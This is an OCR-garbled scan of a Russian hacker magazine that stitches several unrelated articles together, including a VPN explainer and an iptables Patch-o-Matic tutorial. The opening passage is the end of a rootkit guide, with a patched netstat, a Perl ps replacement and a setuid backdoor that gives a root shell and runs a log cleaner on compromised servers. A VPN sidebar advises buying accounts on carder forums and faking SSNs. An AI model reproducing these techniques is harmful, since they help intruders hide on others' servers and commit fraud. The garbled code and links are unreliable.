гетасісіг двоеточие, а затем номер порта. 
Дело в том, что если админ не укажет клю- 
чик -п к команде пеізіаі, то адрес не резолв- 
нется из символьного имени в числовое, со- 
ответственно, в списке подключений отобра- 
зится твой хост, а не ір-адрес. Чтобы сде- 
лать патч универсальным для всех флагов, 
придется принудительно резолвнуть хост в 
айпишник, а только потом сравнивать с ад- 
ресом в конфиге. Именно для этого я вста- 
вил строку зігсру(заѵе_асІсІг, гет асісіг) перед 
вышеназванной командой. Эта функция сох- 
ранит значение гет асісіг в шпионской пере- 
менной заѵе асісіг. Двигайся далее, пока не 
увидишь вывод инфы о конкретном ТСР-сое- 
динении. Перед распечаткой оформи резолв 
хоста в ір-адрес: 

Іі = ($ігисі Ііозіепі *)де1Іі05ІЬупате(5аѵе_асІ(1г); 
тетсру(&с!іеск_а(ІсІг, Іг>1і_а(1(1г_1і$і[0], зігеоІЩгисі іп_ас!(Іг)); 
$ргіпЩ$аѵе_а(І(Іг,"%$" 1 іпеі_піоа(сІіеск_а(І(Іг)): 

Данный код был честно спионерен из про- 
екта ззбсі :). Это еще раз подтверждает, что 
тебе совсем необязательно знать Си (кто 
запрещает юзать код из других приложе- 
ний?). В элемент массива И->И асісіг ІізІ: за- 
носятся все ір-адреса, прикрепленные к 
конкретному хосту. Затем в переменную 
сИеск асісіг копируется указатель на первый 
айпишник (в бинарном режиме), а потом 
происходит его преобразование в читабель- 
ный адресок. 

Следующие строки по содержанию очень 
похожи на патч для іріаЫез. Открывается 




файл РАТН ІР РИЕ, затем в цикле сравнива- 
ются две переменные (текущая и эталонная), 
и в случае положительного результата вво- 
дится переменная Мбе. От значения послед- 
ней решается, выводить состояние на экран 
или нет. 

А ОСТОРОЖНО! ПРОЦЕССЫ! 

Если говорить о процессах, то пропатчить 
/Ьіп/рз так сходу не получится. В коде 
ргосрз юзается обработка бинарных дан- 
ных, которая, к сожалению, мне не по зу- 
бам :(. Впрочем, я обошелся более краси- 
вым вариантом защиты своих процессов от 
посторонних глаз. Для этого мне пришлось 
перенести оригинальную версию бинарника 
рз в другое место (скажем, в 
/изг/Ьіп/рз_ІІ5і). Затем я написал неболь- 
шой регі-скрипт, который смотрит файл со 
скрываемыми процессами и сравнивает 
каждый из них с выводом /изг/Ьіп/рз_ІІ5і. 
Если строки совпали - на экран они никог- 
да не попадут :). Невероятно, но эта ути- 
литка находится на многих "моих" серве- 
рах, и мало админов обратили на нее вни- 
мание. Конечно, держать перловый скрипт 
в каталоге /Ьіп стремно, поэтому приходит- 
ся компилировать его в бинарный файл 
при помощи регісс. Зацени простой код 
сценария на скриншоте либо скачивай его 
с сайта ^ір://капеп$к.пеі.гиДогЬ/ 1 /х/р$.іаг.д 2 . 

Встречаются также шедевры, выполнен- 
ные в виде зіі-скрипта. Сценарий запускает 
бинарник рз и на лету фильтрует его вывод 
утилитой дгер. Но такую простую подделку 
очень легко обнаружить. 




| ажіи вс I в ■ - I .1 . Э! і : к. |м.рі 

(МшгШш/рн'] 
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Такой вот простой перловый скрипт 



^СОТВООТ? 

Представь ситуацию: ты локально проника- 
ешь на сервер и берешь рутовые права, не- 
важно, через какую багу. Теперь перед тобой 
возникает задача: как повторно добиться ру- 
товых прав? Конечно, можно залить публич- 
ный руткит и распрощаться с сервером (это 
мы уже проходили). В данном случае лучше 
всего наколбасить бинарник, позволяющий 
брать рутовые права и запускать логклинер 
(ты же не любишь следить в логах?), а затем 
обозвать его непривлекательным именем :). 
Исходный код подобной программы будет 
выглядеть следующим образом: 



Бэкдор - составная часть твоего руткита 



таіп() { 

$еіиіс1(0); 

$еіді(1(0); 

$у$іет("/и$г/1)іп/ігасегоиіе6 хакер 0 0 м ): II ігасегоиіеб - это 
логклинер, в моем случае ѵапі$1і2 :). 

$у$іет("/Ьіп/Ьа$Іп"): 

} 



Старайся указывать неприметное имя 
файла. Не думаю, что админ простит тебе 
суид на бинарнике /изг/Ьіп/зісІіп и т.п. Я 
люблю называть подобный бэкдор именами 
ігасегоиіеб или аі, если файлов с такими 
именами не существует. 

А КОМПЛЕКТУЕМ 

Конечно, приведенный выше комплект 
нельзя назвать законченным. Например, я 
совсем ничего не сказал про патчинг соге- 
иіііз (про бинарники би, Із и т.п.), а также 
про демоны ззііб и зузіодб. На мой взгляд, 
руководствуясь этой статьей, ты сможешь 
пропатчить остальные исходники самосто- 
ятельно. После того как ты создашь полно- 
ценный руткит, позаботься о грамотно на- 
писанном инсталляторе. Последний может 
выглядеть, как обычный зИ- либо как прод- 
винутый регі-скрипт. Это нужно только для 
удобства, представь: ты рутаешь сервер, а 
затем запускаешь всего один файл, и хаке- 
рские бинарники быстро копируются куда 
нужно. Надеюсь, я тебя убедил в том, что 
можно написать функциональный руткит 
без хорошего знания языка программиро- 
вания. Поверь, это будет лучшим решени- 
ем по сравнению с установкой публичного 
шпионского пакета. По крайней мере, ни- 
какой сбгооікіі тебя не обнаружит. Доказа- 
но Іапиззі :). X 
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И чень иного читателей пишут нан письиа, в которых спрашивают, как добиться собственной анонимности при работе в Сети. Причины 
дин этого у всех разные. Что таи, мы и саии ежедневно стапкиваеися с этой же проблемой: Хинт - перекачивая гигабайтные свопы 
сс, Бублик - пытаясь зацепить нового друга в форуме любителей секса с мертвыми азиатскими тушканами, а Форб - устанавливая 
новую версию своего бэкдора на ШО’вские спутники. Настало время ответить на твои вопросы и рассказать о технологии, способной 
обеспечить почти 100% анонимность. 

ВСЯ ИНФП О ѴРИ 



Л ПОКППОЧКИ ОБЪЕДИНИМ? 

режде всего давай немного 
абстрагируемся и пофантази- 
руем. Предположим, что у нас 
есть несколько локальных се- 
тей. Причем все они располо- 
жены на некотором расстоя- 
нии друг от друга. К примеру, 
пусть это будут локальные се- 
ти нескольких офисов какой-то крупной фир- 
мы. От нас требуется немногое - всего лишь 
объединить их. В принципе, ничего сложно- 
го в этом задании нет. Все более чем вы- 
полнимо. Первое, что приходит на ум - ис- 
пользовать Ш\І (ѴѴісІе Агеа Меіѵѵогк). Говоря 
проще, проложить между этими локалками 
собственные выделенные линии. Вариант, 
конечно, не из дешевых, зато полученной 
скорости и уровня безопасности ему будет 
не занимать. 

Однако есть одно большое «но». Эта схе- 
ма теряет всякий смысл в тех случаях, когда 
требуется связать локальные сети, находя- 
щиеся на значительном расстоянии друг от 
друга. Сам посуди. Одна только покупка ка- 
беля на объединение двух локалок из разных 
городов обойдется в бешеные деньги. А что 
если требуется связать международные или, 
того хуже, межконтинентальные УШ’ы? 




Прокладывать свой кабель по дну океана? 
Не думаю. Хотя подожди, есть еще один ва- 
риант - арендовать выделенный канал. Но 
едва ли он нам подойдет, так как, во-пер- 



вых, аренда также требует значительных фи- 
нансовых вложений. А во-вторых, далеко не 
всегда доступна. 
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приватный канап 



Невольно напрашивается вопрос: а суще- 
ствует ли альтернативное решение? Куда бо- 
лее доступное, но в то же время способное 
обеспечить должную скорость передачи дан- 
ных и уровень безопасности? Я не сделаю 
открытия, но оно существует :). Известно, 
что практически любой населенный пункт 
вдоль и поперек завязан оптоволокном, ви- 
той парой и прочими проводами. Интернет 
применяется повсеместно, и было бы край- 
не глупо не воспользоваться его общедос- 
тупными и, что немаловажно, вполне быст- 
рыми каналами. А что? Зачем тянуть свои 
собственные кабели, если это уже сделали 
за нас? Использование публичных каналов 
не только поможет объединить сколько 
угодно ЬАМ’ов, но и позволит подключаться 
к сети любому количеству удаленных поль- 
зователей. А значит - минус расходы на по- 
купку модемных пулов, ВАЗ-серверов и оп- 
лату дорогой телефонной связи (ты никогда 
не пробовал позвонить в секс по телефону в 
Америку?). 

Само собой разумеется, что такая идея 
пришла в голову не одним нам. И ее реали- 
заций существует даже несколько. Одна из 
наиболее продвинутых - технология вирту- 
альных частных сетей. Или, как сказали бы 
наши англоязычные товарищи, ѴРМ (Ѵіііиаі 
Ргіѵаіе Мейѵогк). 

^пчтотпкоеири? 

ѴРМ - это частная сеть, которая основывает- 
ся на объединении удаленных узлов при по- 
мощи публичных каналов связи (в абсолют- 
ном большинстве случаев - на интернете). 
Технология подразумевает создание между 
удаленными узлами специального туннеля, 
по которому и проходит обмен данными. 

В общем случае схема соединения еди- 
ничного удаленного узла (одного компьюте- 
ра или целой локалки - неважно) к какому-то 
центральному офису выглядит весьма прос- 
то. Сперва этот узел коннектится к местному 
провайдеру и посылает специализированный 
запрос. После чего запрос шифруется и пе- 
редается посредством инета ѴРИ -серверу. 
Наконец, проводится аутентификация и в 
случае успеха сервер формирует запрошен- 
ный ѴРІМ-туннель. Немаловажно, что создан- 



ный туннель непрозрачен для провайдера и 
всех остальных его пользователей. 

А О ЧТО НУЖНО? 

В принципе, для организации ѴРИ ничего 
сверхъестественного не требуется. Начнем с 
интернет-канала. Само собой разумеется, 
что он должен присутствовать как в цент- 
ральном офисе, так и у каждого удаленного 
узла. Причем неважно, каким именно будет 
этот канал. Лучше бы, конечно, чтобы это 
была толстая выделенка, хотя с тем же успе- 
хом можно воспользоваться низкоскорост- 
ным диалапом. От этого напрямую зависит 
лишь скорость передачи данных, но никак не 
предоставляемые возможности. 

Так, со связью разобрались - двигаемся 
дальше. Ясное дело, что для организации 
ѴРМ необходимо какое-то оборудование. А 
так как резиновым кошельком могут похвас- 
таться немногие, нет ничего удивительного в 
том, что этим оборудованием зачастую явля- 
ются обычные компьютеры. На платформе 
РС вполне реально организовать 1 00% рабо- 
чую виртуальную сеть чисто программными 
средствами. Весь необходимый софт в этом 
случае встраивается в операционную систе- 
му. Что касается крупных фирм, то они час- 
тенько отдают предпочтение аппаратным ре- 
шениям - специализированным ѴРМ-марш- 
рутизаторам. Девайсы эти хотя и несколько 
дороговаты, но цену чаще всего вполне оп- 
равдывают. 

А ТИПЫ ИРМ 

Выделяют три типа ѴРМ. Попробуем по по- 
рядку разобраться с каждым из них. 

ѴРЫ удаленного доступа (гетоіе- 
ассезз), как правило, используются компа- 
ниями, которым необходимо предоставить 
своим работникам удаленный доступ к сети. 




ѴРЫ называются объединения в единую сеть 
разрозненных локалок какой-либо корпора- 
ции. Ты еще не забыл пример, который мы 
рассматривали в начале статьи? Это и есть 
Іпігапеі ѴРІ\І. 

Межкорпоративные (Ехігапеі-Ьазесі) 

ѴРЫ определяют связь между локалками не 
одной, а нескольких различных компаний. Ча- 
ще всего - компаньонов по бизнесу (в том чис- 
ле и е-соттегсе). Говоря умными словами, в 
целях улучшения производственного процесса. 




л Каждая машина 
может быть членом 
только одной ѴРЫ. 
Хотя цепочку ѴРМ 
организовать тео- 
ретически вполне 
возможно. Но нуж- 
но ли? :) 



Технология ѴРИ подразумевает несколько 
уровней защиты соединения. 



А Информацию о 
том, как поднять 
ѴРИ под Ыпих, ты 
можешь прочитать 
в подробнейшей 
статье РогЬ’а, 
опубликованной в 
#11/03 номере. 




Главное требование 
в этом случае - на- 
личие у удаленных 
пользователей эле- 
ментарного доступа 
в глобальную Сеть. 
Нередко в этих це- 
лях применяется 
диал-ап, поэтому 
этот тип ѴРМ еще 
нередко называют 
Ѵіііиаі Ргіѵаіе ЭіаІ-ир 
Меіѵѵогк (ѴРЭМ). 

Этот тип сейчас так- 
же широко исполь- 
зуется для органи- 
зации публичных 
ѴРМ-шлюзов (под- 
робнее - во врезке), 
а также спутниковы- 
ми интернет-про- 
вайдерами. 

Внутрикорпо- 

ративными 

(Іпігапеі-ЬазесІ) 



А БЕЗОППСНОСТЬ 

С точки зрения безопасности может пока- 
заться полнейшей глупостью использование 
публичных каналов для передачи данных. И 
все потому, что при таком раскладе многие 
данные, в том числе и конфиденциальная 
информация, будут передаваться в открытом 
виде. А значит могут быть с легкостью пе- 
рехвачены! Как бы это ни было прискорбно, 
но по умолчанию возможность проконтроли- 
ровать процесс передачи данных не предус- 
мотрена. 

Именно поэтому технология ѴРМ подразу- 
мевает несколько уровней защиты соедине- 
ния. В первую очередь стоит отметить, что 
данные в виртуальных частных сетях переда- 
ются в зашифрованном виде. Наиболее час- 
то используемыми в ѴРМ -решениях алгорит- 
мами кодирования являются ЭЕЗ, Тгіріе ЭЕЗ 
и различные реализации АЕЗ. Каждая из них 
подразумевает то, что прочитать закрипто- 
ванные данные может лишь обладатель клю- 
ча к шифру. Причем помимо криптографи- 
ческих алгоритмов активно применяются 




а Документы о 
том, как поднять 
ѴРМ под ѴѴіпсІоѵѵз, 
ты найдешь на 
этих сайтах: 
ѵтѵѵ.О8р.ги/ѵѵіп200 
0/ѵѵогкпІ/200 1/06/6 



ЗСШш и шш. 
сііпе1.ги/розеіир_ѵр 
п_хр.рІір. А здесь 
лежит офигитель- 
ный мануал по 
ѴРЫ: ѵлотѵ.іюѵѵзіиіі- 
ѵгогкз.сот/ѵрп.Мт. 
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специальные методы идентификации лиц и 
объектов, задействованных в ѴРМ. Это га- 
рантирует, что объект действительно являет- 
ся тем, за кого себя выдает. Но и это еще не 
все! Плюс к этому имеют место специальные 
методы проверки целостности данных, отве- 
чающие за то, чтобы информация дошла до 
адресата именно в том виде, в каком она 
была послана. Среди алгоритмов проверки 
целостности можно выделить два наиболее 
популярных - ІѴЮ5 и ЗНА1 . Надо заметить, 
процесс аутентификации в ѴРЫ отнюдь не 
ограничивается примитивной схемой «имя - 
пароль». В последнее время все чаще и ча- 
ще юзаются специализированные системы 
сертификатов, а также серверы для их про- 
верки - СА (СегМісайоп Аиіііогіііез). 

А ПРОТОКОЛЫ ИРМ 

Ясень пень, что для построения защищенных 
туннелей между несколькими локальными 
сетями требуются довольно продвинутые 
протоколы. Наибольшее распространение из 
десятки имеющихся получили лишь трое: 
ІРЗес, РРТР и І_2ТР. Разберемся с каждым по 
отдельности: 

ІРЗес (Іпіегпеі Ргоіосоі Зесигііу) - 

обеспечивает защиту на сетевом уровне и 
требует поддержки стандарта ІРзес только 
от устанавливающих ѴРІМ -туннель устройств. 
Все остальные девайсы, расположенные 
между ними, отвечают лишь за транспорт ІР- 
пакетов, в которых, в свою очередь, содер- 
жатся зашифрованные данные. На этапе 
подключения обе стороны заключают так на- 
зываемое соглашение для обмена данными, 
которое определяет ряд очень важных пара- 
метров соединения. Таких, как ІР-адреса 
отправителя и получателя, используемые ал- 
горитмы шифрования и аутентификации, по- 
рядок обмена ключами, их размер и срок 
действия. 

РРТР (РоіпМо-РоіпІ Типпеііпд 
Ргоіосоі) - совместная разработка таких из- 
вестных брэндов, как 113 ВоЬойсз, М іеговой, 
ЗСОМ. РРТР поддерживает 40 и 128-битное 
кодирование, а для аутентификации исполь- 
зуют обычные схемы РРР. І.2ТР (І_ауег 2 
Типпеііпд РгоіосоІ) - результат кропотли- 
вой работы сотрудников известнейшей 
Сізсо. Эдакая смесь РРТР и другого продукта 
этого же разработчика - протокола І_2Р 
(Ьауег 2 Роп/ѵагсііпд). Примечательно, что 
І_2ТР совместим с ІРЗес. Углубляться силь- 
нее не буду - рассказывать об особенностях 
того или иного протокола можно долго. За- 
мечу лишь, что благодаря изящному реше- 
нию некоторых задач и невероятной гибкос- 
ти ІРЗес стал наиболее популярным. Так, 




Такой вот девайс (Сізсо 1720 ѴРМ Роиіег) стоит не 
менее $1000 



судя по результатам нескольких исследова- 
тельских групп, примерно 70-75% частных 
виртуальных сетей функционируют именно 
на его основе. Прямо-таки стандарт де- 
факто. 

Потоки НО ѴРИ 

Важно понять, что все эти протоколы не 
шифруют данные, а лишь определяют ис- 
пользуемые алгоритмы шифрования. И по- 
мимо этого контролируют остальные пара- 
метры ѴРМ -туннеля. Немало умников пыта- 
лось найти в этих протоколах какой-нибудь 
изъян, серьезную ошибку, грозящую нару- 
шить целостность приватной сети. Но... за 
последнее время не было найдено ни одной 
более-менее серьезной уязвимости. Отсюда 
делаем вывод: браться за взлом ѴРІМ-сети на 
уровне протокола - дело неблагодарное. 



Взламывать шифр - тоже не лучшее пред- 
ложение, т.к. используемые в технологии 
ѴРЫ алгоритмы более чем устойчивы к по- 
добным атакам. Для декодирования идущих 
по сети данных, пожалуй, не хватит потенци- 
ала даже среднего суперкомпьютера. Что уж 
говорить об обычном РС. Тем более, никто 
не может дать гарантию, что ты возьмешься 
за дешифровку именно той информации, ко- 
торая тебе интересна. 

Короче говоря, складывается впечатле- 
ние, что сама по себе технология ѴРЫ прак- 
тически безупречна. Безупречна-то она, мо- 
жет, и безупречна, но всю ее хваленую на- 
дежность могут с легкостью свести на нет 
даже незначительные ошибки в используе- 
мом оборудовании. И это особенно актуаль- 
но, когда ѴРЫ обеспечивается чисто програ- 
ммными средствами. Так как в этом случае 
любое проникновение в ось, поддерживаю- 



Для декодирования идущих по сети 
данных, пожалуй, не хватит потенциала 
даже среднего суперкомпьютера. 



доешь анонимность! 



В г 

к 




Домашняя страница хостера, который, помимо всего прочего, предлагает 
анонимные ѴРІМ-шлюзы 



( последнее вре- 
мя все попу- 
лярнее становит- 
ся мегамодный 
сервис - аноним- 
ные ѴРІЧ-шлюзы. 

Если увидишь 
громкие слоганы 
«Долой носки и 
прокси, да здрав- 
ствует ѴРЫ!», 
знай - это оно! 

Предприимчивые 
перцы арендуют 
за бугром широ- 
кий канал, нала- 
живают защи- 
щенный ѴРЫ- 
шлюз и начинают 
продавать ѴРІЧ- 

аккаунты за деньги. Потенциальный покупатель в этом случае по- 
лучает офигительный сервис. Первостепенная его задача - разу- 
меется, обеспечение анонимности. А ее хоть отбавляй. Куда бы 
ты ни пошел, какой бы софт ни использовал - везде будет све- 
титься ІР-шник, выделенный тебе ѴРЫ-шлюзом. Естественно, 
носки и прокси еще никто не отменял. Но, коллега, поверь мне - 
этот способ обеспечения анонимности куда лучше. И не поду- 
май, что это реклама. Никак нет! Я сужу по себе: когда я хочу ос- 
таться инкогнито, мне приходится выполнять целый ряд 
действий. Для начала я нахожу свежие ргоху-листы (точнее, 
сокс-листы) и в обязательном порядке проверяю их на работос- 
пособность. Причем серверы, что находятся в далеком Зимбаб- 
ве, как правило, не подходят - скорость не та. Поэтому приходит- 
ся тщательно отбирать среди них наиболее шустрые. Далее не- 
избежна процедура «соксофикации программ» с построением 
используемых носков в цепочку. Более того, время от времени и 
вовсе требуется наладить безопасный 55Н-туннель, дабы обес- 
печить шифрование данных. Я параноик? Нет, просто люблю 
спать спокойно. Анонимные же ѴРЫ-шлюзы разом решают все 
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щую ѴРМ-шлюз, может обернуться потерей 
конфиденциальной информации. Тут уже не 
помогут даже самые стойкие криптографи- 
ческие алгоритмы и длинные ключи. Печаль- 
но. И особенно потому, что взлом ОС - за- 
дача довольно стандартная и зачастую легко 
реализуемая благодаря багам в различных 
сервисах и ядре системы. 

Аппаратные средства хотя и считаются ку- 
да более безопасными, но и на них особен- 
но надеяться не приходится. Поищи интере- 
са ради в багтраке заметки об уязвимостях в 
ѴРІМ -оборудовании. Уверяю тебя, ты будешь 
неприятно удивлен! Критических ошибок не- 
меренно. Причем в самом разном оборудо- 
вании - как в серверном, так и в клиентском. 
Публичные эксплоиты, слава Богу, на каж- 
дом шагу не валяются, но в приватных архи- 
вах подобного добра наверняка хватает. 
Особенно с учетом официально признанной 
крупной утечки исходников Сізсо. 

А Н0П0СПЕД0К 

В последнее время ѴРИ начинают встречаться 
все чаще и чаще. Так что ты в порядке вещей 
должен как можно быстрее познакомиться с 
этой поистине революционной технологией. 
Иначе не исключено, что рано или поздно ты 
попадешь впросак, оприходовав свежий сер- 
вак с установленным на нем ѴРІМ-шлюзом и не 
зная, с какой стороны к нему подойти :). ЗС 



эти проблемы - для этого нужно лишь залогиниться в частную 
сеть. Минимум геморроя при максимуме анонимности. Немало- 
важно и то, что трафик шифруется, а значит логи провайдера 
станут абсолютно бесполезными. 

Главный вопрос - где эти самые ѴРЫ -аккаунты взять? К сожале- 
нию, направо и налево их не раздают, на халяву не выделяют. 
Придется, как говорится, изрядно попыхтеть. Разумеется, проще 
всего аккаунт купить. Объявления подобного плана имеются 
практически на всех форумах хакерской и кардерской тематики. 
Типичный пример - недавно умершая борда 
Нир:/Догит.сагсІегрІапеІ.сс. Если мне не изменяет память, 
там эта услуга стоила $50/месяц. Согласен, немало. Поэтому с 
целью экономии можно обратиться к буржуям - есть все шансы, 
что выйдет дешевле. Проштудировав форумы и различные сай- 
ты (набери в любимом поисковике «анонимный ѴРЫ»), не забудь 
об ІРС. Живое общение с людьми порой дает ощутимые резуль- 
таты, т.к. ѴРЫ-аккаунт вполне можно выцыганить или на что-ни- 
будь обменять. Главное - выбрать правильную стратегию трей- 
динга. Не нужно выкладывать разом все имеющееся у тебя хо- 
зяйство. Порой один редкий эксплоит стоит десяти таких аккаун- 
тов. Но и жадничать особо не стоить, т.к. жлобов, естественно, 
мало кто любит и уважает. 

Помнится, год назад на сайтах нескольких американских универ- 
ситетов была возможность получить доступ к ѴРЫ-шлюзу совер- 
шенно бесплатно. Само собой разумеется, что услуга предос- 
тавлялась исключительно преподавателям и студентам вуза. Од- 
нако долгое время регистрация не подразумевала даже элемен- 
тарной сверки регистрирующегося с базой данных универа. 
ѴРЫ-аккаунт мог получить любой желающий. К несчастью, сер- 
вис впоследствии стал достоянием общественности, и под напо- 
ром кучи ламеров халяву прикрыли. Но я уверен, что подобные 
фишки есть и сейчас, нужно лишь поискать. И если ты такую 
фишку найдешь, то изволь грамотно заполнить регистрацион- 
ную форму. Главное - не вызвать подозрение у проверяющего 
аккаунты человека. А для этого нужно вводить корректные и чле- 
нораздельные данные, в том числе валидный 2ІР-код и такую 
штуку, как ЗосіаІ Зесигйу ЫитЬег (5/Ы). Для США номер социаль- 
ного страхования имеет вид ХХХ-ХХ-ХХХХ, гдеХ - цифра (0-9). 



ТІР^ТРХСИіЗ 



Хочешь увидеть свои советы в журнале? Присылай их на адрес ЗкІуагоѵ@геаІ.хакер.ги. 
Ведущий рубрики Тірз&Тгіскз Иван Скляров. 



л На суд зрителей выставляю один из способов глумления над дискетой. Суть 
глумления заключается в том, чтобы записать на дискету 3 с малым метра ин- 
формации. 

Необходимо: дискета (квадратная, емкостью 1,4 МВ) и утилита ЗеагсН апсі 
Весоѵег (ѴѴШ.І0І0.С0П). 

Шаг 1 : 

о. Записываем на дискету инфу (сколько влезет), 
в. Стираем с дискеты инфу (5Ш-ЮеІ). 
о. Записываем еще инфу (сколько влезет), 
о. Стираем с дискеты инфу. 

Вывод: на дискете нет инфы. 

Шаг 2: 

€1. Запускаем прогу ЗеагсП апб Весоѵег. 

О. Выбираем пункт "АсІѵапсесІ сіеіеіесі ТМе зеагсП". 

Ѳ. Жмем СТгІ+И и выбираем диск А:\. 

о. Жмем Зеагсіі и смотрим на правое поле - там вся наша инфа. 

о. Выделяем все и жмем СІгІ+Епіег для восстановления. 

Итог: на дискете есть много инфы :). 



кусок-сахара 

кусоксахара@уап(1ех.ги 
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П о недавнего времени у любителей В80-систен возможности стандартного Иплх-файрвола ірІаЫез могли вызвать только приступы 
гулкого смеха. «Ну это же полный спив! - обоснованно заявляли они. - Это просто какая-то тупая недоделка». В самом деле, тот же 
р( значительно функциональнее ІрІаЫез: он умеет лихо шейпить трафик, делать П8 ГілдегРгілІ, компоновать порты и ір-адреса в 
одном правиле. Нет повода дня грусти, амиго, сегодня мы утрем нос зазнавшимся ВЗВ’шникам! 




9СТПНПВПИВПЕМ ФЗ НКЦИОНППЬНЫИ ПОТЧ для ІРТ0ВІЕ8 




Ч то говорить, ІрІаЫез не совсем 
универсальный файрвол. 

Он умеет лишь элементарные 
вещи: фильтровать доступ, му- 
тить МАТ, но не более того. 
Многие админы жалуются на 
неудобный синтаксис и ограни- 
ченные возможности известного 
сетевого экрана. Но недавно программисты 
со всего мира собрали в единый пакет все 
патчи, которые когда-либо писали. Проект 
получил красивое название Раісб-о-Маііс. 



^ ЧТО ЭТО 30 ЗВЕРЬ такой? 

Раісб-о-Маііс (или просто РОМ) представля- 
ет собой набор различных патчей, укрепляю- 
щих и модифицирующих брандмауэр. После 
установки этого чудесного фикса админ мо- 
жет рулить сервером по полной: устанавли- 
вать вероятность срабатывания того или 
иного правила, ставить временные рамки ру- 
леса, ограничивать подключения к опреде- 
ленному демону, очищать заголовки пакетов 
и искать в них определенные слова, опреде- 
лять версию ОЗ и многое другое. Я сам уди- 
вился, когда узнал о функциональности пат- 
ча и сперва подумал, что это какая-то лажа. 
Но установив обновление, я не разочаровал- 
ся в новых фичах межсетевого фильтра. 



Прежде чем что-либо ставить, следует 
оговориться. Рассматриваемый патч - это 
не просто набор модулей для іріаЫез, по- 
этому перенос новых модулей в /ІіЬ/іріа- 
Ыез не прокатит. Потребуется внести из- 
менения в код ядра, добавив туда необхо- 
димые таблицы и цели. То есть грт-щики 
страдают в первую очередь :). Если ты в 
их числе, научись собирать ядро из исход- 
ников. Работа РОМ проверялась на ядре 
2.4.24 (более свежую версию ломало вы- 
качивать из инета :)). Что касается ветки 
2.6.x, о ней в ІИЗТАИ вообще ничего не 
сказано, возможно, с подобным ядрышком 
сдружить РОМ не получится (хотя я не 
проверял). Вот, собственно, и все тонкос- 
ти установки. Если тебя ничего не оста- 
навливает, давай приступим к процессу 
накладывания патчей. 

А ВЫБЕРИ СВОЙ МОДУЛЬ! 

Если ядро собирается из исходников, то и 
файрвол придется перекомпилировать. Вы- 
качивай свежую версию ІрІаЫез- 1 .2.9 

(Шр://пеШІіег.огд/ііІе$/іріаЫе$-1.2.9іаг.Ь22) и прила- 
гающийся к ней патч (Шр://пеШег.огд/(іІе$/раіс[т 
о-таііс-пд-20040621.іагМ). Обязательно убедись 
в наличии файла /еіс/іегтсар (инсталлятор 
РОМ работает с библиотекой іегтсар). 



Теперь пересобери іріаЫез. Чтобы про- 
цесс пошел правильным путем, твое ядро 
должно быть собрано из исходников, причем 
последние понадобятся и для сборки файр- 
вола. Если ты любитель грт-ядер, выкачи- 
вай последний кернел с йр.кегпеі.огд и компи- 
лируй его. Я полагаю, что проблем с ядром 
у тебя не возникнет. Если так, переходи в 
каталог с раісб-о-таііс. Здесь ты не най- 
дешь ничего интересного, лишь пару тексто- 
виков и перловый скрипт гипте. Его и за- 
пускай :). Без стартовых параметров сцена- 
рий откажется работать. Дело в том, что не- 
обходимо указать тип устанавливаемых пат- 
чей. Нас интересуют ехіга и базе (патчи, ко- 
торые идеально работают друг с другом). 
Когда ты запустишь сценарий, тебя ждет ин- 
тересный интерактивный опрос. Будет пока- 
зан Меір к модулю и предложение установить 
патч. Если честно, лучше всего зайти в ката- 
логи базе и ехіга, самостоятельно изучить 
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каждое обновление, составить краткий спи- 
сок необходимых патчей и установить их. Но 
это мое мнение, ты можешь поступать как 
тебе угодно. 

Теперь переходим к самому вкусному. 
Пиши таке теписопіід (либо таке хсопТід, 
если в иксах сидишь) и заходи в раздел 
№іѵѵогкіпд Орііопз -> ИеШіег Сопіідигаііоп. 
Там ты увидишь кучу новых вкусностей. Пос- 
ледовательно отмечай, какие модули устано- 
вились скриптом РОМ 'а в качестве подгру- 
жаемых. Отметил? Тогда наступает время 
для перекомпиляции ядра. 

Хотя стоп! Когда я проделывал эти ша- 
ги, то столкнулся с необычным обстоя- 
тельством. Несмотря на то, что модули 
ТАРРІТ и озі были отмечены, в ядре не 
создались іагдеі ТАРРІТ и таісіі озТ Поэ- 
тому пришлось объявить их вручную. На 
всякий случай открой файл .сопіід для 
редактирования и убедись в наличии 
двух опций: 




ШЕШР№Ш6ЕТШРІТ=т 

С(МІ6_ІР_МР_МАТСН_0$Р=т 

Если эти строки присутствуют, то с по- 
мощью іріаЫез можно рулить модулем опре- 
деления ОЗ и создавать пустые сокеты. О 
тонкой настройке этих патчей я расскажу 
чуть позже. 

После того как ты пересоберешь ядро, 
перезагрузись. Убедись, что кернел не поте- 
рял своей функциональности. Теперь зайди 
в исходники іріаЫез и переустанови бранд- 
мауэр. Это необходимо для того, чтобы іріа- 
Ыез подвязал все необходимые модули и 
перенес их в /ІіЬ/іріаЫез. 

^ тонкая настройка 

ОБНОВЛЕНИИ 

С установкой вроде как покончено. Теперь 
пришло время сделать то, ради чего, собствен- 
но, мы ставили Раісіі-о-Маііс. А именно поп- 
рактиковаться в его применении. Я начну сос- 
тавление рулесов с самых вкусных и удобных 
модулей. 

О. ИЬірІ_Ііте.50 

Модуль представляет собой средство вре- 
менной активации правила. Представь, нап- 
ример, такую ситуацию: ты админишь маши- 
ну под Ііпих, где установлен ѵѵеЬ-сервер. В 
целях экономии трафика не хочется, чтобы 
посетители обращались к вебу после 20 ча- 
сов вечера. В 8 утра правило должно поте- 
рять свою силу. Естественно, ты можешь ре- 



ДРУГИЕ МОДУЛИ 



К роме описанных модулей, хотелось бы отметить патч 
пеіплар, который нужен для организации ЫАТ (как 5ЫАТ, так 
и ОЫАТ). В ядре создается цель ІЧЕТМАР, после чего можно сде- 
лать статическую привязку вида 1:1 к любой сети. Например, 
хочется связать туннелем две сети: 192.168.0.0 и 192.168.1.0. 
Если без патча пришлось бы писать 254 одинаковых правила, с 
обновлением жить становится намного легче: 

# ІріаЫез -і паі -А РНЕН01ЛШ6 -5 192.168.0.0/24 ШМАР --іо 192.168.1.0/24. 

Помимо чисто сетевых патчей, РОМ содержит множество об- 
новлений для отдельных сервисов. Например, для организации 
ЭСС в ІПС, передачи ІІзегРМе в Еддбгор, а также игровые патчи 
для НІ_, ОІІАКЕ, ѴѴагСгаЙ и других игр. 




шить эту несложную проблему с помощью 
крона, но более изысканное решение пред- 
лагает модуль іріііте. Добавляй следующее 
правило в систему и забудь о проблеме: 

# іріаЫез -А ШРІЛ -р іср --сірогі 80 -т ііте --іітезіагі 20:00 

-іітезіор 08:00 -] КЕЛСТ 

Задачу можно усложнить дополнитель- 
ным условием. Например, в выходные 
трафик тарифицируется по льготным рас- 
ценкам, поэтому закрывать доступ в суб- 
боту и воскресенье необязательно. Мо- 
дуль ііте снабжен опцией --сіауз, которая 
позволяет удобно конфигурировать вре- 
менной диапазон. Правило будет выгля- 
деть следующим образом: 

